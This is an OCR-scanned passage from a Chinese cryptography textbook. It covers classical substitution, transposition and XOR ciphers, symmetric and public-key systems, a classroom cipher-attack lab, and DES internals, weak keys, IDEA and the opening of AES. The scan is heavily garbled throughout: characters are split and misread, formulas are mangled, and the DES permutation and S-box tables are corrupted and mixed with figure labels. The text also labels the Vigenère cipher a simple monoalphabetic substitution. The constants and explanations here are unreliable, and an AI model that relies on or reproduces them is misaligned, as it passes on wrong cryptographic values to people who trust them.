@ 制作 维 吉 利 亚 方 阵 如 表 1. 1 所 示 。 规 则 是 第 i 行 以 I 打头 。 


表 1.1 维 吉 利 亚 方 阵 


。26 。 


Ss TU VW YY ZA BC DE FGHLIIELMNO 
bt VARB 人 人 


st | A BCDE FG HT TKLMNOPOQORS TUVWAY 


@ 按 密 钥 的 长 度 将 PP 分解 若干 节 。 这 里 basic 的 长 度 为 5, 故 将 明文 分 解 为 表 1. 2 所 
示 的 样子 。 


表 1.2 按照 密 钥 分 解 明文 


@ 对 每 一 节 明 文 , 利 用 密 钥 basic 进行 变换 。 以 明文 d 为 例 ,变化 的 方法 是 : 由 于 d 处 
于 密 钥 中 字母 b 指定 的 列 ( 见 表 1. 2) ,因此 在 维 吉利 亚 方 阵 的 ( 见 表 1. 1)b 行 中 找到 d 列 所 
对 应 字符 (E) 即 是 。 其 他 类 推 。 于 是 得 到 如 下 密 文 : 
C= Eek(P) = EALIU FCMZK UY 
使 用 ASCII 码 ,所 发 送 的 位 流 为 ， 
01000101010000010100110001001101010101010100011001000011010011010100101001 
0010110101010101011101 
这 种 密码 是 将 明文 中 的 一 个 字母 用 一 个 相应 的 密 文 字母 蔡 换 , 称 简 单 蔡 换 密码 (simple 
substitution cipher) 或 单字 母 密 码 (mono alphabetic cipher) 。 它 应 用 简单 ,但 系统 太 脆 弱 、 
太 容 易 被 攻破 了 。 于 是 又 设计 出 多 种 替换 法 形式 。 
(2) 多 名 蔡 换 密码 (homophonic substitution cipher) : 一 个 字母 可 以 映射 为 多 个 密 文字 
母 。 如 : 
A~5,12,25556 
Be 7517591587 


(3) 多 字母 密码 (poly alphabetic cipher) : 字符 块 被 成 组 加 密 。 如 : 
ABA ~ RTQ 
ABB ~SLL 


1.1.2 换 位 密码 


换 位 就 是 将 明文 中 字母 的 位 置 重新 排列 。 最 简单 的 换 位 就 是 逆序 法 ,即将 明文 中 的 字 
母 倒 过 来 输出 。 例 如 : 
明文 : computer system 


密 文 : metsys retupmoc 

这 种 方法 太 简 单 ,非常 容易 破 密 。 下 面 介绍 一 种 稍 复杂 的 换 位 方法 一 一 列 换 位 法 。 

使 用 列 换 位 法 ,首先 要 将 明文 排 成 一 个 矩阵 ,然后 按 列 进行 输出 。 为 此 要 解决 两 个 问题 : 

。 排 成 的 矩阵 的 宽度 一 一 有 多 少 列 ; 

。 排 成 矩阵 后 ,各 列 按 什么 样 的 顺序 输出 。 

为 此 ,要 引入 一 个 密 钥 玉 , 它 既 可 定义 矩阵 的 宽度 ,又 可 定义 各 列 的 输出 顺序 。 例 如 开 
一 computer, 则 这 个 单词 的 长 度 (8) 就 是 明文 矩阵 的 宽度 ,而 该 密 钥 中 各 字母 按 在 字母 序 中 
出 现 的 次 序 , 就 是 输出 的 列 的 顺序 。 表 1. 3 为 按 密 钥 对 明文 WHAT CAN YOU LEARN 
FROM THIS BOOK 的 排列 。 于 是 .输出 的 密 文 为 

WORO NNSX ALMK HUOO TETX YFBX ARIX CAHX 


表 1.3 按 密 钥 排列 的 明文 举例 


密 钥 0 M P U T E R 

顺序 号 1 4 3 5 8 7 2 6 
Ww A 党 C A N 尝 
0 U I E A R N F 

明文 
R 0 M 二 H I S B 
O O K 流 X 9 Xx 式 

1.1.3 简单 异 或 
异 或 运算 具有 如 下 特点 : 


0®@0=0, 0@1=1, 1@0=1, 
1®@1=0, a@Ba=0, a@BbMO@b=a 
即 两 个 运算 数 相 同 , 结 果 为 0; 两 个 运算 数 不 同 ,结果 为 1。 
使 用 简单 异 或 进行 加 密 , 就 是 将 明文 与 密 钥 进 行 异 或 运算 ,解密 则 是 对 密 文 用 同一 密 钥 
进行 异 或 运算 。 即 


PO@OK=C CO@K=P 
1.1.4 分 组 密码 


分 组 密码 是 一 种 加 密 管理 方法 。 它 的 基本 思想 是 将 明文 报 文 编码 (例如 用 0、1 码 进 行 
编码 ) ,并 按照 一 定 的 长 度 (m) 进 行 分 组 ,再 将 各 组 明文 的 码 分 别 在 密 钥 的 控制 下 进行 加 密 。 
例如 将 明文 编码 按照 64 位 为 一 组 进行 分 组 。 

采用 分 组 密码 的 好 处 是 便于 标准 化 ,便于 在 分 组 (如 X. 25、IP) 网 络 中 被 打包 传输 。 其 
次 ,由 于 一 个 密 文 组 的 传输 错误 不 会 影响 其 他 密 文 组 ,所 以 容易 实现 同步 。 但 是 由 于 相同 的 
密 文 一 定 对 应 相同 的 明文 ,所 以 分 组 密码 不 能 隐蔽 数据 模式 ,同时 也 不 能 抵抗 组 重 放 、 骨 人 
和 删除 等 攻击 。 


1.1.5 对 称 密码 体制 和 非 对 称 密 码 体制 


如 前 所 述 ,一 个 加 密 过 程 可 以 描述 为 
站 


C = Fek(P) 
其 中 ,E 为 加 密 函 数 ,EK 为 加 密 密 钥 。 相 对 应 的 ,可 以 把 解密 写成 
P= Dok(C) 
其 中 ,D 为 解密 函数 ,DK 为 解密 密 钥 。 于 是 ,按照 DK 与 EK 的 关系 ,可 以 分 为 两 种 情况 : 
(1) 对 称 密码 体系 。 若 一 种 加 密 方法 有 DK 二 EK., 则 称 其 为 对 称 密码 体系 ,或 称 单 钥 密 
码 。 在 这 种 方法 中 ,加 密使 用 的 密 钥 与 解密 使 用 的 密 钥 相同 。 在 对 称 密码 体制 中 ,最 为 著名 
的 加 密 算法 是 IBM 公司 于 1971 一 1972 年 研制 成 功 的 DES(data encryption standard, 数 据 
加 密 标 准 ) 分 组 算法 ,1977 年 被 定 为 美国 联邦 信息 标准 。 
(2) 非 对 称 密码 体系 。 若 一 种 加 密 方法 有 DK 隆 EK, 则 称 其 为 非 对 称 密码 体系 ,或 称 双 
钥 密码 。 在 这 种 方法 中 ,加 密使 用 的 密 钥 与 解密 使 用 的 密 钥 不 相同 。 在 非 对 称 密码 体系 中 ， 
最 著名 的 是 以 MIT 的 R，Rivest\A. Shamir 和 L. M. Adleman 三 名 数学 家 的 名 字 命名 的 
RSA 算法 。RSA 加 密 体系 对 一 对 密 钥 有 如 下 要 求 
。 加 密 和 解密 分 别 用 不 同 的 密 钥 进行 ,如 用 加 密 密 钥 EK 对 明文 尸 加 密 后 ,不 能 再 用 
EK 对 密 文 进行 解密 ,只 能 用 相应 的 另 一 把 密 钥 DK 进行 解密 得 到 明文 。 即 有 
Dek (Eek (P))AP 和 Dpr (Err (P))=P, 
。 加 密 密 钥 和 人 解密 密 钥 可 以 对 调 , 即 Dex (Epxr (P)) 二 P。 
。 应 能 在 计算 机 上 容易 成 对 生成 ,但 不 能 由 已 知 的 DK 导出 未 知 的 EK ,也 不 能 由 已 知 
的 EK 导出 未 知 的 DK。 


1.1.6 密 钥 的 安全 与 公开 密码 体制 


如 前 所 述 ,密码 的 安全 决定 于 算法 的 安全 和 密 钥 的 安全 两 个 方面 。 为 此 在 使 用 中 可 以 
采用 两 种 不 同 的 策略 : 一 种 是 基于 算法 保密 的 策略 , 另 一 种 是 基于 密 钥 保密 的 策略 。 基 于 
算法 保密 的 安全 策略 也 称 受 限制 的 算法 策略 。 这 种 策略 曾经 被 使 用 ,但 是 在 现代 密码 学 中 
已 经 不 再 使 用 。 原 因 如 下 : 

(1) 算法 是 要 人 掌握 的 。 一 旦 人 员 变 动 ,就 要 更 换算 法 。 

(2) 算法 的 开发 是 非常 复杂 的 。 一 旦 算法 泄密 ,重新 开发 需要 一 定 的 时 间 。 

(3) 不 便于 标准 化 : 由 于 每 个 用 户 单位 必须 有 自己 唯一 的 加 密 算法 ,不 可 能 采用 统一 
的 硬件 和 软件 产品 ,否则 偷窃 者 就 可 以 在 这 些 硬件 和 软件 的 基础 上 进行 猜测 式 开 发 。 

(4) 不 便于 质量 控制 : 用 户 自己 开发 算法 ,需要 好 的 密码 专家 ,否则 对 安全 性 难以 保障 。 

因此 ,现代 密码 学 认为 ,所 有 加 密 算法 的 安全 性 都 应 当 基于 密 钥 的 安全 性 ,而 不 是 基于 
算法 实现 的 细节 。 这 就 意味 着 加 密 算法 可 以 公开 ,也 可 以 被 分 析 , 可 以 大 量 生产 使 用 算法 的 

品 , 即 使 攻击 者 知道 了 算法 也 没有 关系 ,只 要 不 知道 解密 具体 使 用 的 密 钥 , 就 不 能 破译 密 
文 。 所 以 保密 的 关键 是 保护 解密 密 钥 的 安全 。 

按照 这 一 思想 ,对称 密码 体制 运算 效率 高 、 使 用 方便 ,加 密 效率 高 ,是 传统 企业 中 最 广泛 
使 用 的 加 密 技 术 。 但 是 ,由 于 通信 双方 使 用 同样 的 密 钥 , 因 此 无 论 任何 一 方 生成 密 钥 ,都 要 
通过 一 定 的 渠道 向 对 方 传送 密 钥 , 有 可 能 在 传送 过 程 中 使 密 钥 泄露 ,而 且 通信 双方 无 论 任 何 
一 方 泄密 ,都 会 给 双方 造成 损失 。 

由 于 在 非 对 称 密码 体制 中 ,加 密 与 解密 使 用 不 同 的 密 钥 ,所 以 情况 就 大 有 不 同 。 设 通信 
在 AB 之 间 进 行 , 则 可 以 采用 下 面 的 方法 生成 密 钥 .: 
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(1) A 端 产生 一 对 密 钥 ,将 其 中 一 个 自己 保存 , 另 一 个 传递 给 B 端 ; 
(2) B 端 也 产生 一 对 密 钥 ,将 其 中 一 个 自己 保存 , 另 一 个 传递 给 A 端 。 
这 样 , 每 端 都 拥有 两 个 密 钥 : 一 个 是 只 有 自己 知道 ,其 他 任何 人 都 不 知道 的 密 钥 , 称 为 
人 A 方 的 私 钥 , 记 做 SKA ; 另 一 个 是 对 方 传 来 的 ,自己 和 对 方 都 知道 的 密 钥 , 称 为 A 端的 公 钥 ， 
记 做 PKA 。 于 是 非 对 称 密码 体制 可 以 提供 如 图 1. 1 所 示 的 方法 进行 加 密 : 
。 A 端 先 用 自己 的 私 钥 SKA 对 数据 加 密 ,形成 密 文 Esk (P) 再 用 也 方 的 公 钥 PKs 对 加 
密 ,形成 双重 加 密 的 密 文 Erpr, (下 sk、( 卫 ))。 
。 双 重 加 密 的 密 文 Ex, (Ese、(P)) 传 送 至 方 后 ,B 方 先 用 B 方 的 私 钥 SKs 进 行 一 次 
解密 ,得 到 Esk、(P); 再 用 A 方 的 公 钥 PKA 解 密 进 行 二 次 解密 ,才能 将 二 重 密 文 最 


Esk (P) Epk,Esk.(P) Esk(P) 
六 | 一 | 方志 


{ 1 | 


SKA PKs SKp PKA 
图 1.1 非 对 称 密码 体制 的 加 密 与 解密 


在 这 种 情况 下 ,为 了 保护 数据 的 机 密 性 ,只 要 对 每 一 方 的 私 钥 加 以 保护 即 可 。 而 公 钥 可 
以 不 进行 保护 ,甚至 可 以 公开 。 这 样 就 不 存在 密 钥 传 输 中 的 失 密 问题 了 。 所 以 ,通常 也 将 
非 对 称 密码 体制 称 为 公开 密 钥 体制 ,因为 要 向 对 方 传送 的 一 个 密 钥 可 以 被 公开 。 这 也 就 
是 通常 把 公开 ( 非 对 称 ) 密 钥 体 系 中 的 密 钥 记 为 SK 和 PK ,而 不 再 使 用 记号 EK 和 DK 的 
原因 。 

公开 密 钥 体制 的 问题 是 算法 效率 低 。 所 以 ,一 般 都 是 用 公开 密 钥 系统 传送 对 称 密 码 体 
制 中 的 密 钥 ,再 用 对 称 密 码 体制 传送 密 文 。 

公开 密 钥 体制 是 斯 坦 福 大 学 的 两 名 科学 家 Diffie 和 Hellman 在 1976 年 提出 来 的 。 


实验 1 加 密 博 弈 


1. 实验 目的 


(1) 掌握 古典 加 密 程 序 的 设计 方法 。 
(2) 掌握 进行 密码 攻击 的 方法 。 


2. 实验 内 容 

(1) 实验 由 两 (组 ) 人 共同 完成 : 一 (组 ) 人 进行 加 密 程 序 设计 , 另 一 (组 ) 人 进行 密码 攻 
击 程序 设计 。 

(2) 程序 要 求 : 加 密 程序 由 一 组 程序 组 成 .分别 是 用 置换 法 、 换 位 法 、 异 或 法 或 它们 的 
组 合 方法 设计 。 


(3) 实验 在 一 些 文件 上 进行 。 
(4) 实验 过 程 中 要 能 记录 攻击 时 间 。 
(5) 一 轮 实 验 完成 后 ,加 密 方 与 攻击 方 角色 互 换 , 再 继续 进行 另 一 轮 实 验 。 
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3. 实验 准备 
(1) 设计 实验 过 程 和 环境 。 例 如 双方 可 以 通过 电子 邮件 互相 传送 。 


(2) 设计 加 密 程序 组 和 攻击 程序 组 。 
(3) 准备 实验 用 的 被 加 密 文件 。 


4. 推荐 的 分 析 讨论 内 容 
分 析 影 响 密码 加 密 强 度 的 因素 。 


1.2 数据 加 密 标准 算法 


1.2.1 DES 及 其 基本 思想 


1973 年 5 月 ,美国 国家 标准 局 发 出 通告 ,公开 征求 对 计算 机 数据 在 传输 和 存储 期 间 的 
进行 数据 加 密 的 算法 。 要 求 : 

(1) 必须 提供 高 度 的 安全 性 ; 

(2) 具有 相当 高 的 复杂 性 ,使 得 破译 的 开销 超过 获得 的 利益 ,但 同时 又 便于 理解 和 
掌握 ; 

(3) 安全 性 应 当 不 依赖 于 算法 的 保密 ,加 密 的 安全 性 仅 以 加 密 密 钥 的 保密 为 基础 ; 

(4) 必须 适合 不 同 的 用 户 和 不 同 的 应 用 场合 ; 

(5) 实现 算法 的 电子 器 件 必 须 很 经 济 ,运行 有 效 ; 

(6) 必须 能 够 有 出 口 。 

此 后 数 年 内 ,美国 的 许多 公司 .研究 机 构 和 大 学 开发 了 许多 算法 。1975 年 ,IBM 提出 的 
算法 被 采纳 ,并 向 全 国 公布 ,征求 意见 。1977 年 1 月 15 日 ,美国 国家 标准 局 正式 采用 这 个 
算法 作为 数据 加 密 标准 (同年 7 月 15 日 生效 )。 这 就 是 DES。 

DES 算法 的 基本 思想 是 将 二 进 制 序列 的 输入 明文 以 64 位 为 数据 分 组 ,然后 对 这 些 明 
文 进行 替换 和 换 位 ,最 后 形成 密 文 ,如 图 1. 2 所 示 。 

DES 算法 的 基本 特点 如 下 : 

(1) 对 称 算法 : 既 可 用 于 加 密 , 也 可 用 于 解密 。 

(2) 64 位 的 密 钥 ,使 用 长 度 为 56 位 (64 位 明文 中 有 8 位 用 于 奇偶 校 验 ) 。 

(3) 加 密 算 法 是 混淆 与 扩散 的 结合 ,或 者 说 是 换 位 与 置换 的 结合 。 

(4) 每 个 DES 都 在 明文 上 实施 16 重 相 同 的 组 合 技术 ,如 图 1. 3 所 示 。 这 种 重复 性 可 
以 被 非常 理想 地 应 用 到 一 个 专用 芯片 中 。 


1.2.2 DES 加 密 过 程 细 化 


1. DES 加 密 的 细 化 结构 
图 1.4 是 图 1.3 的 细 化 。 从 图 1.4 中 可 以 看 出 ,DES 加 密 过 程 主要 涉及 如 下 环节 (模块 ): 


1 


56 位 密 角 


1 
初始 换 位 压缩 变换 
1 1 56 位 密 钥 
16 轮 加 密 变换 | 一 一 卫生 成 16 个 48 位 子 密 钥 
1 
逆 初 始 换 位 


64 位 明文 组 64 位 密 文 组 
Ee 


图 1.2 DES 加 密 思 想 


初始 换 位 和 逆 初 始 换 位 ; 

将 64 位 明文 分 为 32 位 的 左右 两 段 : L。 
和 Ro; 

进行 16 轮 相 同 的 迭代 运算 : 混淆 十 异 
或 十 交换 ; 

将 最 后 左右 两 段 合 并 ; 

。 生成 每 一 轮 的 子 密 钥 K;。 

表 1. 4 为 初始 换 位 IP 和 逆 初 始 换 位 IP-: 。 
初始 变换 IP 是 将 二 titsta…testas 变 换 成 To 一 
tsstsotz…tisty 。IP-:! 为 IP 的 逆 变 换 。 

将 明文 分 成 左右 两 段 和 将 左右 两 段 合并 比 
较 简 单 ,这 里 就 不 介绍 了 。 下 面具 体 介绍 关于 
每 一 轮 的 迭代 和 每 一 轮 使 用 的 子 密 钥 的 生成 
过 程 。 


2. DES 子 密 钥 的 生成 


图 1.5 是 生成 每 一 轮 使 用 的 48 位 子 密 钥 
的 过 程 。 

下 面 介 绍 它 的 各 个 环节 。 

(1) 压缩 变换 PC-1 与 分 割 得 到 Co 、D。 

PC-1 的 作用 是 去 掉 奇 偶 校 验 位 8.16,24， 
32,40,48,56,64 后 , 按 56 位 进行 换 位 。 换 位 
算法 如 表 1.5 所 示 。 

(2) 密 钥 移 位 

56 位 密 钥 被 分 成 两 部 分 之 后 ,每 一 部 分 为 
28 位 。 在 每 一 轮 中 进行 一 次 左 移 位 , 左 移 的 位 
数 因 轮 数 而 异 , 如 表 1.6 所 示 。 
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1 


图 1.3 DES 加 密 过 程 


64 位 明文 组 


1 
初始 换 位 下 


得 到 Lo 得 到 Ro 
f Ki 
Li=Ro Ro=LoOf(Ro,K)) 
db- K, 


LR R,=LIOf(R.K,) 


1 1 
LisRia Ris=Lia®f(R1sK1s) 
Ki 
了 
Rie-Lis@Of(Ris,Kie) [Lie-Ris 


逆 初 始 换 位 IP- 
64 位 密 文 组 
图 1.4 DES 加 密 过 程 


表 1.4 初始 换 位 IP 和 逆 初 始 换 位 IP- 


(a) IP 
58 | 50 | 42|34|26|18|10|2 
60 |52|44|36|28|20|121| 4 
64 位 密 钥 62 | 54|46|38|30|22114156 
于 嫁 变 所 EC 64 |56|48|140|132|24|16| 8 
56 位 密 钥 57 | 4 | -3 | | |. 准 1 
分 割 得 到 Co Do 
28 位 3 128 位 58 | 8 | -43 | :36 | 27 | 9r | 寺中 总 
左 移 左 移 61|53|45|37|29|21|13|5 
1 1 
压 绢 赤 搞 EC-2 63 | 55 |47|39|31|123|115| 7 
Ki(48 位 ) 
二 
一 一 下 (b) IP-: 
左 移 左 移 40 | 8 |48|16|56|24|64| 32 
39|7 |47|15|55|23|63| 31 
压缩 变换 PC- 2 
K2(48 位 ) 38 | 6 |46|14|54|22|62|30 
二 一 -| 
i 一 37 | 8 | a6 | Yo: | 58: | 2 | 8 | :29 
志 起 36 | 4|144|12|52|20|60|28 
! | 35. 3 | -a8 | 1 | SL | 1 | 59 | 到 
压缩 变换 PC-2 
Kie(48 位 ) 压缩 变换 34|2|142|10|50|18|58|26 
38 | | | | | | 2 
图 1.5 生成 每 一 轮 使 用 的 48 位 子 密 钥 的 过 程 
32 位 Li 32 位 Ri 
表 1.5 PC-!1 变换 及 密 钥 的 分 割 
57|49|41|33|25|17| 9 4 
48 位 K 
SK | 1 |s8|so0|4z2|34|z6|18 
Co=ks7kaoka1*** ksakaak 
lo 2 | 89:15 | 3 妆 | 和 
19|11|3|60|52|44|36 | 
63 | 55 | 47 | 39 | 31 | 23 | 15 t 
7 |62|54|46|38|30|22 
Do=kesksska7*** kaok12ka 
14| 6 |61|53|45|37|29 
32 位 Li 32 位 Ri 
21|13|5|28|2o|12| 4 } 
图 1.6 {算法 的 组 成 


和 


表 1.6 每 轮 左 移 位 数 


(3) 压缩 置换 PC-2 
PC-2 是 从 56 位 密 钥 中 取出 48 位 。 其 算法 如 表 1.7 所 示 。 


表 1.7 PC-2 压缩 算法 


14 5 
号 10 
23 8 
16 器 
41 55 
30 48 
44 53 
46 32 
3. DES 的 f 算 法 


观察 图 1. 4, 现 在 就 剩 下 [算法 还 没有 介绍 了 。 上 算法 是 DES 精华 所 在 ,用 它 来 实现 分 
组 加 密 的 扩展 和 混淆 。 在 DES 中 ,其 他 部 分 是 线性 的 ,而 {算法 是 非 线 性 的 。 如 图 1. 6 所 
示 ,{ 算 法 主要 由 下 - 盒 .S- 盒 和 了 P- 盒 组 成 。 

(1) E- 盒 

E- 盒 (expansion permutation ,扩展 置换 ) 是 把 数据 明文 的 右 半 部 分 R; 从 32 位 扩展 到 
48 位 。 这 样 的 好 处 有 : 

。 可 以 与 48 位 的 密 钥 进行 异 或 运算 ; 

。 有 利于 产生 雪崩 效 应 (avalanche effect) ,尽快 地 使 输出 ( 密 文 ) 的 每 一 位 依赖 输入 

(明文 和 密 钥 ) 的 每 一 位 ; 

。 提供 了 更 长 的 结果 ,以 便 替 代 运 算 时 可 以 压缩 。 

具体 的 办 法 是 对 于 每 个 输入 分 组 ,在 输出 分 组 中 将 第 1.4 位 分 别 对 应 2 位 ,第 2、3 位 不 
变 。 如 图 1.7 所 示 。 这 样 , 尽 管 输出 分 组 大 于 输入 分 组 ,但 每 一 个 输入 分 组 产生 唯一 的 输出 
分 组 。 


输入 1234 5678 9 10 11 12 13 14 15 16 


输出 48 1 2 3 4 5 6 7 8 9 101112131415161718 1920212223 24 25 
对 应 输入 32 1 234 545678989101l12150121314151617016 


图 1.7 下- 盒 扩展 置换 
。34 。 


(2) S- 盒 代 换 

S- 盒 是 进行 了 压缩 后 的 密 钥 (56 位 一 48 位 ) 与 扩展 后 的 明文 分 组 (32 位 一 48 位 ) 异 或 后 进 
行 的。 目的 是 对 48 位 的 输入 替代 压缩 成 32 位 的 输出 。 蔡 代 由 8 个 S- 盒 进行 。 每 个 S- 盒 有 6 
位 输入 ,4 位 输出 。 如 图 1.8 所 示 , 这 8 个 S- 盒 可 以 将 48 位 的 输入 变换 为 32 位 的 输出 。 


48 位 输入 


(GS- 合 1) (GS- 合 2) (8S- 合 3) (S- 合 4) (S- 盒 5) (S- 合 6) (S- 


7) (S- 盒 8) 


em 


32 位 输出 
图 1.8 8 个 S- 盒 的 输入 和 输出 


8 个 S- 盒 的 6 变 4 代 换 , 并 且 每 个 盒 的 代 换 都 不 相同 ,具体 按 表 1. 8 查 表 进 行 。 查 表 
时 ,以 每 个 输入 的 6 位 中 的 中 间 4 位 (bs bs bt bs ) 作 为 行 ,两 边 2 位 (bbs) 作 为 列 。 例 如 ,Ss 的 
6 位 输入 为 101100, 则 用 10(2) 查 Ss: 的 第 10 行 ,用 1100(12) 查 S: 的 12 列 , 得 到 5。 即 输出 
的 4 位 为 0101。 


表 1.8 8 个 S- 盒 查 表 代 换 


bs bs bs bs 

bib, 0 1 2 3 4 5 6 从 8 9 |10|11|12|13|14| 15 

00 14|4|113|1 2 |115|11|8 3|10|6|12|5 9 0 7 

01 0 |15|17 || | 12 | 9 5 3 8 

3. 0 4 1|114|8|13|6 2 |111|15|12|9 7 3 |10 | 5 0 

1 15 | 12 | 8 2 4 9 1 当 5|111|3|14|10|0 6 13 

00 15 | 1 8|114|6 |111|3 4 9 2 |13|12|0 5 10 

01 3 |13|1 4 7 |15| 2 8 |14|121|10 1|10|6 9 | 11 5 

0 0 |114|7111|1|14113| 1 5 8 |121|16 9 3 2 15 

1 13|8|110|1 3|15| 4 2|111|6 7|12|0 5 |114| 9 

00 10 | 0 9|114|6 3|15|5 1113|112|7 |11|4 2 8 

01 1 中 至 0 9 3 4 6 |10| 2 8 5|14|12|11|15 入 

是 0 13 | 6 4 9 8|115|3 0 |11|1 21|12|51|110114|1 7 

1 1 |10|113|0 6 全 8 区 41|115|14|3111|5 2 12 

00 7 |13|14|3 0 6 9 |110|1 2 8 5 |11|12| 4 15 

01 13|81|11|5 6 |15|0 3 4 侣 2|112|1|10|14|9 

和 0 10 | 6 9 0|12|I1|7113115 |11 3 |14| 5 2 8 4 

1 3|115|0 6|10|1113|8 9 4 区区 > 光村 2 14 
dd dd ok ee 
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bs bs bb 

bb, 0 1 2 3 4 5 6 沉 8 9 110|11|12|13|14| 15 
00 2 |12| 4 3 人 由 | 和 8 5 3|15|13|0 |14 9 
01 14|111|2|112|4 对 13: | 和 5 | 5 | 0 | 9 8 6 
” 10 4 2 1 0 拘 | 了 8|115|9|12|5 6 3 0 14 
11 | Il1M4|I2|13|6 |115|0 9|110|4 5 3 
00 12|1|10|115|9 2 6 8 0|113|3 4|114|7 5 对 
01 10 | 15 | 4 2 7 |12| 9 5 6 V13|14|0 |11|3 8 
10 9|114|15|5 2 8|112|3 7 0 4 11 1 二 | 了 6 
11 4 3 2 |12| 9 5115|10|11|14|1 $ 6 0 8 13 
00 4|11|12114115|0 8 | 18 3.| | 7 5 |110|6 ,1 
01 | -类 - 于 下 学 4 9 1 | 了 芭 | 了 下 | 和 5 |12|2115| 8 6 
10 1 #4 | 1 | 13| 12| 3 7|14|10|15|6 8 0 5 9 2 
11 6 |11|13|8 1 4|110|7 9 5 0|15|14|2 3 12 
00 13 | 2 8 4 6 |15|11 1|10|9 3|14|5 0 | 12 
01 1 115113|8|11013 4|112|5 | 2 
10 7 |11|4 Y 9 |12|14| 2 0 6 |10113115 | 3 5 8 
11 2 有 这 4|10|8113115|112| 9 0 3 5 6 11 

(3) P- 盒 置换 


P- 盒 置换 是 对 S- 盒 的 32 位 输出 进行 一 次 换 位 。 表 1. 9 给 出 了 每 位 输入 将 要 换 到 的 新 
位 置 。 


表 1.9 P- 盒 置换 


例如 ,原来 的 第 28 位 , 移 位 到 了 第 7 位 的 位 置 上 。 
1.2.3 关于 DES 安全 性 的 讨论 


DES 自 1973 年 3 月 公开 发 表 以 来 ,已 经 得 到 广泛 的 应 用 。 但 是 在 应 用 中 也 得 到 了 不 
少 批评 ,批评 的 重点 主要 在 以 下 3 个 方面 。 

(1) DES 的 密 钥 空间 较 小 。DES 的 密 钥 长 度 只 有 56 比特 。56 比特 所 提供 的 密 钥 空间 
只 有 2” 的 大 小 。 这 样 的 空间 大 小 , 早 在 1977 年 有 人 只 花费 2000 美元 买 的 VLSI 芯片 ,用 
一 天 就 可 以 搜索 完整 个 的 密 钥 空 间 。 到 了 20 世纪 90 年 代 , 由 于 Internet 的 普及 ,有 人 不 花 
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费 任 何 代价 就 巧妙 地 利用 Internet 的 闲散 资源 组 织 了 超级 计算 ,就 很 快 攻破 了 DES 加 密 的 
密 文 。 

在 实际 使 用 中 , 密 钥 组 成 还 有 一 些 限制 。 这 些 限制 将 使 密 钥 空间 减 小 ,使 DES 密 钥 的 
攻击 难度 大 为 降低 。 表 1. 10 为 不 同 的 限制 对 密 钥 空间 的 影响 


表 1.10 不 同 的 限制 对 密 钥 空间 的 影响 


输入 限制 4 字 节 5 字 节 6 字 节 7 字 节 8 字 节 
小 写字 母 (26 个 ) 4.6X105 1.2X107 3,1X10r 8.0X10? 2, 1X10m 
小 写字 母 和 数字 (36 个 ) LTX 0 6.0X107 2.2X10? 7.8X10" 2.8X10% 
字母 和 数字 (62 个 ) 下 和 9.2X10 .7X10% 3.5X10™ 2:.2 X10 
印刷 字符 (95 个 ) BX 7..7XL0n 7.4X10n 7.0X10% 6.6X1015 
7 位 ASCII 字 符 (128 个 ) 2.8X1lo0 3.4X10 4.4X1022 5.6X10™ 7.2X10™% 
8 位 ASCII 字符 (128 个 ) 4.3X10? 1,1X10* 2.8X104 7.2X108 1.8X108 


除了 密 钥 长 度 的 因素 和 一 些 特 别 限 制 外 ,还 有 密 钥 本 身 的 品质 问题 。 一 个 好 的 密 钥 应 
当 好 记 、 难 猜 。 相 对 而 言 , 易 猜 ,生成 具有 规律 性 .提供 较 低 的 攻击 复杂 度 的 密 钥 称 为 弱 密 负 


(weak key) 。 
局 然 下 0 = 基本 二 三 下 二 下 一 永 或 政 基 二 下 本 二 0 或 1 
时 ,K 将 是 弱 密 钥 。 故 DES 有 以 下 4 种 弱 密 钥 ( 十 六 进 制 表 示 ) : 
01 01 01 01 01 01 01 01 
1F 1F 1F 1F 1F 1F 1F 1F 
E0 E0 E0 E0 E0 E0 E0 EO 
FE FE FE FE FE FE FE FE 
还 有 一 种 密 钥 称 为 半 弱 密 钥 , 即 存在 KK 和 K' 使 得 DESk (m) 二 DESK' (m), 或 
DESk (DESk (xz)) 一 六。K 和 K' 成 对 构成 半 弱 密 钥 。 半 弱 密 钥 有 下 面 12 个 : 
01 FE 01 FE 01 FE 01 FE 
FE 01 FE 01 FE 01 FE 01 
1F E0 1F Eo 1F Eo0 1FE0 
EO0 1F Eo0 1F Eo0 1F E01F 
01 E0 01 EO 01 EO0 01E0 
Eo0 01 E0 01 E0 01 E001 
1F FE 1F FE 1F FE 1FFE 
FE 1F FE 1F FE 1F FE1F 
01 1F 01 1F 01 1F 011F 
1F 01 1F 01 1F 01 1Fol 
EO FE Eo0 FE EO0 FE EOFE 
FE EO0 FE EO FE E0 FEE0 
弱 密 钥 也 减 小 了 密 钥 搜索 空间 ,影响 了 密 钥 的 安全 性 。 
(2) S 盒 算法 的 问题 。S 盒 是 DES 中 唯一 的 非 线 性 组 件 , 其 他 组 件 则 都 是 线性 的 。 所 
以 S 盒 对 安全 的 影响 至 关 重 要 。 但 是 关于 S 盒 的 实际 原理 并 没有 公开 。 斯 坦 福 大 学 的 研究 
i 汤 


人 员 认 为 ,DES 虽然 是 非 线性 的 ,但 不 是 随机 的 。 也 就 是 说 , 它 可 以 由 某 种 机 制 加 以 控制 。 
人 们 发 现 ,只 要 将 第 3 个 S 盒 与 第 4 个 S 盒 对 调 ,就 会 导致 对 DES 算法 的 某 种 攻击 。 所 以 ， 
有 人 怀疑 美国 的 安全 部 门 故意 在 S 盒 中 留 下 一 些 “ 陷 门 ”。 


1.2.4 其 他 对 称 加 密 算法 


1. IDEA 


1990 年 ,瑞士 联邦 技术 学 院 Xuejia Lai 和 James L. Massey 在 DES 的 基础 上 提出 了 一 
种 分 组 加 密 算法 PES(proposed encryption standard, 推荐 的 加 密 标 准 )。1992 年 进行 了 改 
进 ,并 称 之 为 IDEA(international data encryption algorithm ,国际 数据 加 密 算法 ) 。 

IDEA 是 一 种 非常 成 功 的 分 组 加 密 算法 。 其 分 组 长 度 为 64 比特 , 密 钥 长 度 为 128 比 
特 , 它 的 核心 由 8 轮 迭 代 和 一 个 输出 变换 组 成 ,能 使 明码 数据 更 好 地 扩散 和 混淆 ,并 且 运 算 
过 程 只 需 使 用 下 面 3 种 简单 运算 : 

。 逐个 的 位 异 或 ; 

。 模 2 加 ; 

。 模 (2 十 1) 乘 。 

IDEA 具有 专利 限制 。 


2. AES 


针对 DES 的 密 钥 太 短 和 IDEA 具有 专利 限制 ,1997 年 4 月 15 日 ,美国 国家 标准 技术 研 
究 所 (NIST) 发 起 征集 新 的 用 于 保护 敏感 的 非 机 密 政 府 信 息 加 密 标 准 AES(advanced en- 
